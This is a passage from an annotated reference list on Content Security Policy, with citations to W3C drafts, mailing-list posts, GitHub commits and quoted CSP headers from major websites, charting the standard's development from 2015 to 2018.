<https://lists.w3.org/Archives/Public/public-webappsec/2015Dec/0025.html>

[97] [CITE@en[Close #384: add CSP hooks to handle inline events and style · whatwg/html@920c918]]
([TIME[2015-12-15 20:07:56 +09:00]] version)
<https://github.com/whatwg/html/commit/920c9183a7990968ecac1aeedae22391f3438791>

[98] [CITE@en[Content Security Policy: Cookie Controls]]
([TIME[2015-12-13 11:02:51 +09:00]] version)
<http://www.w3.org/TR/2015/WD-csp-cookies-20151215/>

[99] [CITE@en[Content Security Policy: Embedded Enforcement]]
([TIME[2015-12-13 11:05:51 +09:00]] version)
<http://www.w3.org/TR/2015/WD-csp-embedded-enforcement-20151215/>

[100] [CITE@en[Call for Exclusions: Content Security Policy: Cookie Controls and Content Security Policy: Embedded Enforcement]]
(by [[Xueyuan Jia]], [TIME[2015-12-15 17:14:45 +09:00]] version)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Dec/0034.html>

[101] [CITE@en[CfC: CSP3 to FPWD; deadline January 15th.]]
(by [[Mike West]], [TIME[2016-01-08 18:59:12 +09:00]] version)
<https://lists.w3.org/Archives/Public/public-webappsec/2016Jan/0034.html>

[102] [CITE@en[s/serialized policy/serialized CSP/g · w3c/webappsec-csp@17c18c0]]
([TIME[2016-01-13 12:09:31 +09:00]] version)
<https://github.com/w3c/webappsec-csp/commit/17c18c04cbe94a0796e353aa99d972cb9021b3cf>

[103] [CITE@en[Update xrefs for CSP sandbox & frame-ancestors · whatwg/html@088f4f2]]
([TIME[2016-01-21 12:17:02 +09:00]] version)
<https://github.com/whatwg/html/commit/088f4f210541f8c131fb92c4f331c40f4b6b3768>

[104] [CITE@en[Content Security Policy Level 3]]
([TIME[2016-01-26 01:08:50 +09:00]] version)
<https://www.w3.org/TR/2016/WD-CSP3-20160126/>

[105] [CITE@en[IANA: AUTH48 version of the RFC. · w3c/webappsec-csp@1bfbb97]]
([TIME[2016-01-28 23:14:29 +09:00]] version)
<https://github.com/w3c/webappsec-csp/commit/1bfbb97a12e6338c563e19bcfd2582291ab33e80>

[106] [CITE@en[Fix links to CSP list initialization algorithms · whatwg/html@59d9ae1]]
([TIME[2016-01-30 12:17:28 +09:00]] version)
<https://github.com/whatwg/html/commit/59d9ae1ed8df16dbea7eb6906e333d12d8ceeecf>

[107] [CITE@en[CSP: Fix workers' CSP list initialization. · whatwg/html@05f9f32]]
([TIME[2016-01-30 13:30:44 +09:00]] version)
<https://github.com/whatwg/html/commit/05f9f3266d6050b8b299ec365fdc63d5eab5b2b3>

[108] [CITE@en[No CSP report-uri|frame-ancestors|sandbox in meta · whatwg/html@3947072]]
([TIME[2016-01-30 20:55:24 +09:00]] version)
<https://github.com/whatwg/html/commit/39470724136a366bab4e893efd889a513d61cc3e>

[110] [CITE@en[RFC 7762 - Initial Assignment for the Content Security Policy Directives Registry]]
([TIME[2016-01-29 12:26:08 +09:00]] 版)
<https://tools.ietf.org/html/rfc7762>

[114] [CITE@en[FYI: RFC7762 established a registry of CSP directives]]
([[Mike West]] 著, [TIME[2016-02-12 21:07:55 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2016Feb/0047.html>

[115] [CITE@en[IANA bits. · w3c/webappsec-upgrade-insecure-requests@1d4db1a]]
([TIME[2016-02-14 00:56:36 +09:00]] 版)
<https://github.com/w3c/webappsec-upgrade-insecure-requests/commit/1d4db1a5be26ea83caa45e9bbebbb00a100c4102>

[116] [CITE@en[Making it easier to deploy CSP.]]
([[Mike West]] 著, [TIME[2016-02-12 22:56:58 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2016Feb/0048.html>

[119] [CITE@en[Call for Exclusions (Update): Content Security Policy: Cookie  Controls; Content Security Policy: Embedded Enforcement]]
([[Xueyuan Jia]] 著, [TIME[2016-03-15 23:47:16 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2016Mar/0033.html>

[120] [CITE@en[We're not going to enable 'sandbox' in '<meta>'. · w3c/webappsec-csp@8ca78f0]]
([TIME[2016-04-06 16:32:17 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/8ca78f0ed12bbbde0a11c4d58fb936ce0a25f9d7>

[121] [CITE@en[CSP Request Header and CORS preflight fetch. · Issue #52 · whatwg/fetch]]
([TIME[2016-04-11 12:51:01 +09:00]] 版)
<https://github.com/whatwg/fetch/issues/52>

[FIG(quote)[
[FIGCAPTION[
[122] [CITE[CloudFlare - The web performance & security company]]
([TIME[2016-04-16 06:06:26 +09:00]] 版)
<https://www.cloudflare.com/>
]FIGCAPTION]

> content-security-policy:default-src 'self' https://*; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://* data:; img-src 'self' https://* data:; style-src 'self' 'unsafe-inline' https://*; font-src 'self' https://* data:; frame-src https://*; connect-src 'self' data: https://*

]FIG]


[FIG(quote)[
[FIGCAPTION[
[123] [CITE@en[GitHub]]
([TIME[2016-04-18 00:53:37 +09:00]] 版)
<https://github.com/>
]FIGCAPTION]

> Content-Security-Policy:default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com github-cloud.s3.amazonaws.com api.braintreegateway.com client-analytics.braintreegateway.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com checkout.paypal.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com

]FIG]


[FIG(quote)[
[FIGCAPTION[
[124] [CITE@ja[Twitter]]
([TIME[2016-04-18 00:56:15 +09:00]] 版)
<https://twitter.com/>
]FIGCAPTION]

> content-security-policy:script-src https://connect.facebook.net https://cm.g.doubleclick.net https://ssl.google-analytics.com https://graph.facebook.com https://twitter.com 'unsafe-eval' https://*.twimg.com https://api.twitter.com https://analytics.twitter.com https://publish.twitter.com https://ton.twitter.com https://syndication.twitter.com https://www.google.com https://t.tellapart.com https://platform.twitter.com 'nonce-ukbsoXB8DeM97dTLyRPKOw==' https://www.google-analytics.com 'self'; frame-ancestors 'self'; font-src https://twitter.com https://*.twimg.com data: https://ton.twitter.com https://fonts.gstatic.com https://maxcdn.bootstrapcdn.com https://netdna.bootstrapcdn.com 'self'; media-src https://twitter.com https://*.twimg.com https://ton.twitter.com blob: 'self'; connect-src https://graph.facebook.com https://*.giphy.com https://pay.twitter.com https://analytics.twitter.com https://media.riffsy.com https://upload.twitter.com https://api.mapbox.com 'self'; style-src https://fonts.googleapis.com https://twitter.com https://*.twimg.com https://translate.googleapis.com https://ton.twitter.com 'unsafe-inline' https://platform.twitter.com https://maxcdn.bootstrapcdn.com https://netdna.bootstrapcdn.com 'self'; object-src https://twitter.com https://pbs.twimg.com; default-src 'self'; frame-src https://staticxx.facebook.com https://twitter.com https://*.twimg.com https://player.vimeo.com https://pay.twitter.com https://www.facebook.com https://ton.twitter.com https://syndication.twitter.com https://vine.co twitter: https://www.youtube.com https://platform.twitter.com https://upload.twitter.com https://s-static.ak.facebook.com 'self' https://donate.twitter.com; img-src https://graph.facebook.com https://*.giphy.com https://twitter.com https://*.twimg.com data: https://fbcdn-profile-a.akamaihd.net https://www.facebook.com https://ton.twitter.com https://*.fbcdn.net https://syndication.twitter.com https://media.riffsy.com https://www.google.com 
https://stats.g.doubleclick.net https://*.tiles.mapbox.com https://www.google-analytics.com blob: 'self'; report-uri https://twitter.com/i/csp_report?a=NVQXGYLXFVYXO2LGOQ%3D%3D%3D%3D%3D%3D&ro=false;

]FIG]


[125] [CITE@en[Change to expression matching algorithm (#71) · w3c/webappsec-csp@e6d9233]]
([TIME[2016-04-18 13:02:38 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/e6d92335d0b9797fa72517c16dda01dd8e761449>

[126] [CITE@en[Define 'Content Security Policy'. · w3c/webappsec-csp@b98e59b]]
([TIME[2016-04-21 12:03:26 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/b98e59bd478435577f78699e65ee135954e2ce42>

[127] [CITE@en[Content Security Policy Level 3]]
([TIME[2016-04-25 18:02:58 +09:00]] 版)
<https://www.w3.org/TR/2016/WD-CSP3-20160425/>

[128] [CITE@en[Allow hashes to match external scripts · w3c/webappsec-csp@a299d38]]
([TIME[2016-04-26 12:11:05 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/a299d38d1b54e3d9612d11fb69cc8174b5e44051>

[129] [CITE@en[Fix up the logic in source list matching (#74)]]
( ([[shekyan]]著, [TIME[2016-05-03 18:53:58 +09:00]]))
<https://github.com/w3c/webappsec-csp/commit/8c1b6a88777374c3b47976fb5d4201d449a679f1>

[130] [CITE@en[Fold CSPDOCUMENT into CSP.]]
( ([[mikewest]]著, [TIME[2016-05-23 12:05:43 +09:00]]))
<https://github.com/w3c/webappsec-csp/commit/0cd4bf42b5e78168cd85efe798a9a5e719677b8e>

[131] [CITE@en[Updating references from CSPDOCUMENT to CSP]]
( ([[mikewest]]著, [TIME[2016-05-23 15:34:43 +09:00]]))
<https://github.com/whatwg/html/commit/c90e53cfa0d4ae43110589ea7c2718b65be3fda7>

[FIG(quote)[
[FIGCAPTION[
[132] [CITE[CloudFlare - The web performance & security company]]
( ([TIME[2016-05-19 04:03:42 +09:00]]))
<https://www.cloudflare.com/>
]FIGCAPTION]

> Content-Security-Policy: default-src 'self' https://*; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://* data:; img-src 'self' https://* data:; style-src 'self' 'unsafe-inline' https://*; font-src 'self' https://* data:; frame-src https://*; connect-src 'self' https://* wss://*.zopim.com data:;
> 

]FIG]


[FIG(quote)[
[FIGCAPTION[
[133] [CITE@en-US[Chrome incompatibilities - Mozilla | MDN]]
( ([TIME[2016-06-14 10:15:04 +09:00]]))
<https://developer.mozilla.org/en-US/Add-ons/WebExtensions/Chrome_incompatibilities>
]FIGCAPTION]

> content_security_policy
> Firefox does not support:
> "http://127.0.0.1" or "http://localhost" as script sources: they must be served over HTTPS.

]FIG]


[134] [CITE@en-US[Content Security Policy - Mozilla | MDN]]
( ([TIME[2016-05-28 19:17:23 +09:00]]))
<https://developer.mozilla.org/en-US/Add-ons/WebExtensions/Content_Security_Policy>

[135] [CITE@en[Content Security Policy Level 3]]
( ([TIME[2016-06-21 19:25:50 +09:00]]))
<https://www.w3.org/TR/2016/WD-CSP3-20160621/>

[136] [CITE@en[Add IANA considerations section referencing `require-sri-for`]]
([[shekyan]]著, [TIME[2016-06-23 02:17:37 +09:00]])
<https://github.com/w3c/webappsec-subresource-integrity/commit/853ab1bd8815e23001a24c57b68f424cdd09f0b5>

[FIG(quote)[
[FIGCAPTION[
[137] [CITE@en[amphtml/amp-html-format.md at master · ampproject/amphtml]]
([TIME[2016-07-04 11:16:59 +09:00]])
<https://github.com/ampproject/amphtml/blob/master/spec/amp-html-format.md>
]FIGCAPTION]

> AMP HTML documents must not trigger errors when served with a Content Security Policy that does not include the keywords unsafe-inline and unsafe-eval.

]FIG]


[FIG(quote)[
[FIGCAPTION[
[140] [CITE@en[Call for Consensus: Stop work and transition 3 Working Drafts to  Working Group Notes]]
([[Brad Hill]]著, [TIME[2016-07-13 06:33:27 +09:00]])
<https://lists.w3.org/Archives/Public/public-webappsec/2016Jul/0013.html>
]FIGCAPTION]

> CSP Cookie Controls
> https://www.w3.org/TR/csp-cookies/
> Last updated ~6 months ago.
> Reason to transition to Note: The Feature Policy proposal (
> https://wicg.github.io/feature-policy/) could be a better home for the
> intended functionality as part of a broader and more coherent approach,
> rather than putting this into CSP.

]FIG]


[FIG(quote)[
[FIGCAPTION[
[141] [CITE@en[Call for Consensus: Stop work and transition 3 Working Drafts to Working Group Notes]]
(by [[Brad Hill]], [TIME[2016-07-13 06:33:27 +09:00]])
<https://lists.w3.org/Archives/Public/public-webappsec/2016Jul/0013.html>
]FIGCAPTION]

> CSP Pinning
> https://www.w3.org/TR/csp-pinning/
> Last updated ~6 months ago.
> Reason to transition to Note: While this kind of feature is still
> considered useful, like Cookie Controls and Feature Policy, the editor
> feels it would be better managed as part of a more generalized strategy for
> header pinning, and as part of that, with a strategy perhaps along the
> lines of a manifest, well-known resource or service worker that doesn't
> incur the cost of sending the pinning header with every request.

]FIG]


[142] [CITE@en[Transition Cookie Controls and Pinning to NOTE status (#103)]]
(by [[hillbrad]], [TIME[2016-08-02 03:53:52 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/d3705f5c4fda042345bfb1457388ba9c27c69420>

[143] [CITE@en[Pass |origin| into matching algorithms.]]
(by [[@shekyan]], [TIME[2016-08-16 17:21:01 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/3739f6f1b1406c3c88757803859aeb6836028d38>

[144] [CITE@en[Content Security Policy Level 3]]
([TIME[2016-08-18 17:25:03 +09:00]])
<https://www.w3.org/TR/2016/WD-CSP3-20160818/>

[145] [CITE@en[Allow "*" to match scheme of protected resource (#105)]]
(by [[shekyan]], [TIME[2016-08-19 14:24:12 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/22c3ab8ff872668b2454227e87427e8677f4db7c>

[146] [CITE@en[Content Security Policy Level 3]]
([TIME[2016-09-01 17:55:20 +09:00]])
<https://www.w3.org/TR/2016/WD-CSP3-20160901/>

[147] [CITE@en[path -> path-abempty. Closes w3c/webappsec-csp#89.]]
(by [[mikewest]], [TIME[2016-09-02 23:40:20 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/039136ff232995b7573059dbe34c9df3f67a2335>

[148] [CITE[A Refined Content Security Policy | WebKit]]
([TIME[2016-09-04 22:40:23 +09:00]])
<https://webkit.org/blog/6830/a-refined-content-security-policy/>

[149] [CITE@en[generate note versions of obsolete specs]]
(by [[hillbrad]], [TIME[2016-09-04 05:58:14 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/b33ff0aed91c085ebcf1776cc9271f0fc412e678>

[150] [CITE@en[Updating to get things in line with the current CSP and HTML specs.]]
(by [[mikewest]], [TIME[2016-09-09 18:55:24 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/380667c81cea337a78ccc5d1a7ded4976680fa8e>

[151] [CITE@en[Content Security Policy: Embedded Enforcement]]
([TIME[2016-09-09 18:56:58 +09:00]])
<https://www.w3.org/TR/2016/WD-csp-embedded-enforcement-20160909/>

[152] [CITE@en[CSP: Embedded Enforcement]]
(by [[Mike West]], [TIME[2016-09-09 19:03:25 +09:00]])
<https://lists.w3.org/Archives/Public/public-webappsec/2016Sep/0033.html>

[153] [CITE@en[Content Security Policy: Cookie Controls]]
([TIME[2016-09-13 00:50:28 +09:00]])
<https://www.w3.org/TR/2016/NOTE-csp-cookies-20160913/>

[154] [CITE@en[Content Security Policy Pinning]]
([TIME[2016-09-12 23:41:57 +09:00]])
<https://www.w3.org/TR/2016/NOTE-csp-pinning-20160913/>

[155] [CITE@en[Content Security Policy Level 3]]
([TIME[2016-09-13 21:59:07 +09:00]])
<https://www.w3.org/TR/2016/WD-CSP3-20160913/>

[156] [CITE@en[Update IDL to introduce SecurityPolicyVioationEventDisposition type (#…]]
(by [[shekyan]], [TIME[2016-10-06 23:27:55 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/54cdc310b087a61ddff4a79fb8706c55e5b6dc2d>

[157] [CITE@en[Report destination.]]
(by [[mikewest]], [TIME[2016-10-14 21:33:02 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/9c5d9f662bee1948e23ab908c2b9ac65b0a8e291>

[158] [CITE@en[Use request's "current url" rather than "url". (#135)]]
(by [[@estark37]], [TIME[2016-11-06 17:29:01 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/8a88c0cf306b34da6a8fee7cfa574ff9fa34740c>

[159] [CITE@en[Content Security Policy Level 2]]
([TIME[2016-11-05 00:37:05 +09:00]])
<https://www.w3.org/TR/2016/PR-CSP2-20161108/>

[160] [CITE@en[Clarify fetch settings for reporting. (#139)]]
(by [[jdalton]], [TIME[2016-11-08 17:34:44 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/558282b4ea040191066cae4a028dab83a886166a>

[161] [CITE@en[Adding CSPSource subsumption (#138)]]
(by [[Sun77789]], [TIME[2016-11-08 18:31:22 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/928d62261496965f16dcf5fddc5d943670d7f963>

[162] [CITE@en[Handle navigation to `javascript:` URLs as inline script. (#142)]]
(by [[@bzbarsky]], [TIME[2016-11-10 17:07:39 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/479bf6c6e891db0bb1cd7f71be764f3aff6a1a33>

[163] [CITE@en[Change the model for workers.]]
(by [[mikewest]], [TIME[2016-11-29 23:24:18 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/1af72ed19bf952402c514b7e7a966fb234d63217>

[164] [CITE@en[Finding effective directive for a given name (#153)]]
(by [[Sun77789]], [TIME[2016-12-08 20:58:55 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/4c10ab80cf996a35106b2c2f4e5a78fbb6fa819f>

[165] [CITE@en[Intersection of serialized source lists (#157)]]
(by [[Sun77789]], [TIME[2016-12-13 18:29:44 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/59b2839f98e491d0170d1389c6fd857d44b92247>

[166] [CITE@en[Adding intersection of two policies (#163)]]
(by [[Sun77789]], [TIME[2016-12-13 23:21:48 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/317b919cd5819cca0d490b1034f8b9b88abeda16>

[167] [CITE@en[Intersection of a set of policies (#164)]]
(by [[Sun77789]], [TIME[2016-12-13 23:58:14 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/d66e1e348bb4c91b91123c2e3b9b4d326f6b9f8b>

[168] [CITE@en[EE: Effective source list (#165)]]
(by [[Sun77789]], [TIME[2016-12-14 00:01:20 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/23fb3a53e0701a7c4ac971d6b9fc14aab6e77a41>

[169] [CITE@en[EE: Response's CSP list subsumption (#168)]]
(by [[Sun77789]], [TIME[2016-12-14 00:10:40 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/716e7196f1e2b5e4de94bf5bfcddb8660f04ac81>

[170] [CITE@en[Adding issues to take care of the cascade.]]
(by [[mikewest]], [TIME[2016-12-18 00:59:49 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/671fcb45caf6e524179bcbfd71fe68e37660f8b6>

[171] [CITE@en[EE: Cleaning up HTML integration.]]
(by [[mikewest]], [TIME[2016-12-19 22:16:41 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/730b36f3ab9492fcf6f2339d23a15319ca6a779d>

[172] [CITE@en[Restructuring intersection.]]
(by [[mikewest]], [TIME[2016-12-20 19:36:00 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/0e9ae5fc8237359a37000fe6b38c6f508c84bf2b>

[173] [CITE@en[`<iframe srcdoc="<script>">` should not execute when inserted via `innerHTML`. · Issue #2300 · whatwg/html]]
([TIME[2017-01-27 22:34:34 +09:00]])
<https://github.com/whatwg/html/issues/2300>

[177] [CITE@en[Re: Add ability to specify the version of used CSP]]
(by [[Mike West]], [TIME[2017-03-20 23:00:02 +09:00]])
<https://lists.w3.org/Archives/Public/public-webappsec/2017Mar/0025.html>

[178] [CITE@en[Copy/paste 'paths and redirects' from CSP2.]]
(by [[mikewest]], [TIME[2017-05-09 22:17:44 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/402ebd330cd652417d5434d33acba60091a48709>

[179] [CITE@en[Track the source of a given policy. (#214)]]
(by [[mikewest]], [TIME[2017-05-24 19:41:40 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/1082da46cf89a7e5c4ea298a072aab4580aa1e60>

[180] [CITE@en[Polishing {scheme,host,port,path}-matching algorithms.]]
(by [[mikewest]], [TIME[2017-05-31 19:44:52 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/75fca786bd55e665e39774aa9b52e3fc3e38db66>

[181] [CITE@en[The 'csp' IDL attribute reflects the content attribute.]]
(by [[@foolip]], [TIME[2017-06-01 21:22:32 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/3ac127abb700a5d36ff69b4e4afe7b68c91afd9d>

[182] [CITE@en['''['''Execute Script''']''' Note about CSP policies being ignored.]]
(by [[shs96c]], [TIME[2017-08-23 22:14:13 +09:00]])
<https://github.com/w3c/webdriver/commit/c0cc934c652ef0393ca0317ce3b7b290c0bf47df>

[183] [CITE@en[Ask for web-platform-tests in CONTRIBUTING.md (#230)]]
(by [[foolip]], [TIME[2017-09-11 15:54:04 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/6b0476da5dfc661d6aed84f2cb2fa1f5aa0826e9>

[184] [CITE@en[Ask for web-platform-tests in CONTRIBUTING.md by foolip · Pull Request #230 · w3c/webappsec-csp]]
([TIME[2017-09-12 11:42:52 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/230>

[185] [CITE@en[Cleanup `global object` usage to make sense with `Documents` (#254)]]
(by [[andypaicu]], [TIME[2017-11-30 19:48:55 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/80bf6a439a744ebc7cb1b6d7373d0f0236d3584b>

[186] [CITE@en[Cleanup `global object` usage to make sense with `Documents` by andypaicu · Pull Request #254 · w3c/webappsec-csp]]
([TIME[2017-12-01 23:59:23 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/254>

[187] [CITE@en[Replaced 'alias' with 'copy' for less ambiguity (#273)]]
(by [[andypaicu]], [TIME[2017-12-01 20:12:27 +09:00]])
<https://github.com/w3c/webappsec-csp/commit/2c0f4aa08621556a34c245345fcfb41ef899af6b>

[188] [CITE@en[Replaced 'alias' with 'copy' for less ambiguity by andypaicu · Pull Request #273 · w3c/webappsec-csp]]
([TIME[2017-12-05 17:38:22 +09:00]])
<https://github.com/w3c/webappsec-csp/pull/273>

[189] [CITE@en[What does it mean to alias a policy from a CSP list? · Issue #207 · w3c/webappsec-csp]]
([TIME[2017-12-05 17:40:56 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/207>

[190] [CITE@en[23357 – Subverting CSP policies for browser add-ons (extensions).]]
([TIME[2018-01-18 13:20:48 +09:00]])
<https://www.w3.org/Bugs/Public/show_bug.cgi?id=23357>

[191] [CITE@en[CSP 1.1: Remove note about extensions.]]
(by [[mikewest]], [TIME[2014-01-30 01:11:09 +09:00]])
<https://github.com/w3c/webappsec/commit/cbfaa8edfadebf21a9c7428242c12e45934d8c55>

[192] [CITE@en[CSP vulnerability enabling cross-origin session data exfiltration · Issue #289 · w3c/webappsec-csp]]
([TIME[2018-01-27 17:01:57 +09:00]])
<https://github.com/w3c/webappsec-csp/issues/289>

[193] [CITE@en[Hide nonce content attribute values]]
(by [[mikewest]], [TIME[2017-11-23 00:15:47 +09:00]])
<https://github.com/whatwg/html/commit/19f5cce801550d278b9459f8c4797f9f86aae864>

[194] [CITE@en[Consider hiding `nonce` content attributes. · Issue #2369 · whatwg/html]]
([TIME[2018-02-17 23:20:59 +09:00]])
<https://github.com/whatwg/html/issues/2369>

[FIG(quote)[
[FIGCAPTION[
[195] [CITE@ja[Twitter name search]]
([TIME[2018-04-14 19:55:29 +09:00]])
<https://twitter.com/search-home>
]FIGCAPTION]

> content-security-policy:script-src https://connect.facebook.net https://cm.g.doubleclick.net https://ssl.google-analytics.com https://graph.facebook.com 'nonce-OYd+Tgp6EYGXSARn0PRbbg==' https://twitter.com 'unsafe-eval' https://*.twimg.com https://api.twitter.com https://analytics.twitter.com https://publish.twitter.com https://ton.twitter.com https://syndication.twitter.com https://www.google.com https://t.tellapart.com https://platform.twitter.com https://www.google-analytics.com blob: 'self'; frame-ancestors 'self'; font-src https://twitter.com https://*.twimg.com data: https://ton.twitter.com https://fonts.gstatic.com https://maxcdn.bootstrapcdn.com https://netdna.bootstrapcdn.com 'self'; media-src https://rmpdhdsnappytv-vh.akamaihd.net https://prod-video-eu-central-1.pscp.tv https://v.cdn.vine.co https://dwo3ckksxlb0v.cloudfront.net https://twitter.com https://amp.twimg.com https://smmdhdsnappytv-vh.akamaihd.net https://*.twimg.com https://prod-video-eu-west-1.pscp.tv https://rmmdhdsnappytv-vh.akamaihd.net https://clips-media-assets.twitch.tv https://prod-video-us-west-2.pscp.tv https://prod-video-us-west-1.pscp.tv https://prod-video-ap-northeast-1.pscp.tv https://smdhdsnappytv-vh.akamaihd.net https://ton.twitter.com https://rmdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://smpdhdsnappytv-vh.akamaihd.net https://prod-video-sa-east-1.pscp.tv https://mdhdsnappytv-vh.akamaihd.net https://prod-video-ap-southeast-2.pscp.tv https://mtc.cdn.vine.co https://dev-video-us-west-2.pscp.tv https://prod-video-us-east-1.pscp.tv blob: 'self' https://prod-video-ap-southeast-1.pscp.tv https://mpdhdsnappytv-vh.akamaihd.net https://dev-video-eu-west-1.pscp.tv; connect-src https://rmpdhdsnappytv-vh.akamaihd.net https://prod-video-eu-central-1.pscp.tv https://graph.facebook.com https://*.giphy.com https://dwo3ckksxlb0v.cloudfront.net https://vmaprel.snappytv.com https://smmdhdsnappytv-vh.akamaihd.net https://*.twimg.com https://embed.pscp.tv 
> https://api.twitter.com https://prod-video-eu-west-1.pscp.tv https://rmmdhdsnappytv-vh.akamaihd.net https://clips-media-assets.twitch.tv https://prod-video-us-west-2.pscp.tv https://pay.twitter.com https://prod-video-us-west-1.pscp.tv https://analytics.twitter.com https://vmap.snappytv.com https://*.twprobe.net https://prod-video-ap-northeast-1.pscp.tv https://smdhdsnappytv-vh.akamaihd.net https://syndication.twitter.com https://sentry.io https://rmdhdsnappytv-vh.akamaihd.net https://media.riffsy.com https://mmdhdsnappytv-vh.akamaihd.net https://embed.periscope.tv https://smpdhdsnappytv-vh.akamaihd.net https://prod-video-sa-east-1.pscp.tv https://vmapstage.snappytv.com https://upload.twitter.com https://proxsee.pscp.tv https://mdhdsnappytv-vh.akamaihd.net https://prod-video-ap-southeast-2.pscp.tv https://dev-video-us-west-2.pscp.tv https://prod-video-us-east-1.pscp.tv 'self' https://vmap.grabyo.com https://prod-video-ap-southeast-1.pscp.tv https://mpdhdsnappytv-vh.akamaihd.net https://dev-video-eu-west-1.pscp.tv; style-src https://fonts.googleapis.com https://twitter.com https://*.twimg.com https://translate.googleapis.com https://ton.twitter.com 'unsafe-inline' https://platform.twitter.com https://maxcdn.bootstrapcdn.com https://netdna.bootstrapcdn.com 'self'; object-src https://twitter.com https://pbs.twimg.com; default-src 'self' blob:; frame-src https://staticxx.facebook.com https://twitter.com https://*.twimg.com https://5415703.fls.doubleclick.net https://player.vimeo.com https://pay.twitter.com https://www.facebook.com https://ton.twitter.com https://syndication.twitter.com https://vine.co twitter: https://www.youtube.com https://platform.twitter.com https://upload.twitter.com https://s-static.ak.facebook.com https://4337974.fls.doubleclick.net https://8122179.fls.doubleclick.net 'self' https://donate.twitter.com; img-src https://graph.facebook.com https://*.giphy.com https://*.pscp.tv https://twitter.com https://*.twimg.com https://ad.doubleclick.net data: 
> https://clips-media-assets.twitch.tv https://lumiere-a.akamaihd.net https://fbcdn-profile-a.akamaihd.net https://www.facebook.com https://ton.twitter.com https://*.fbcdn.net https://syndication.twitter.com https://media.riffsy.com https://www.google.com https://stats.g.doubleclick.net https://platform.twitter.com https://api.mapbox.com https://www.google-analytics.com blob: https://*.periscope.tv 'self'; report-uri https://twitter.com/i/csp_report?a=NVQWGYSXFVZXO24GOQ%3D%3D%3D%3D%3D%3D&ro=false;

]FIG]


[FIG(quote)[
[FIGCAPTION[
[196] [CITE@ja[Facebook - Log in or sign up]]
([TIME[2018-04-14 19:59:33 +09:00]])
<https://www.facebook.com/>
]FIGCAPTION]

> content-security-policy:default-src * data: blob:;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' fbstatic-a.akamaihd.net fbcdn-static-b-a.akamaihd.net *.atlassolutions.com blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net *.spotilocal.com:* *.akamaihd.net wss://*.facebook.com:* https://fb.scanandcleanlocal.com:* *.atlassolutions.com attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' chrome-extension://boadgeojelhgndaghljhdicfkmllpafd chrome-extension://dliochdbjfkdbacpmhlcpmleaejidimm;

]FIG]


[FIG(quote)[
[FIGCAPTION[
[197] [CITE@en[GitHub]]
([TIME[2018-04-14 20:03:16 +09:00]])
<https://github.com/>
]FIGCAPTION]

> Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com collector.githubapp.com api.github.com www.google-analytics.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; img-src 'self' data: assets-cdn.github.com identicons.github.com collector.githubapp.com github-cloud.s3.amazonaws.com *.githubusercontent.com; manifest-src 'self'; media-src 'none'; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com; worker-src 'self'

]FIG]
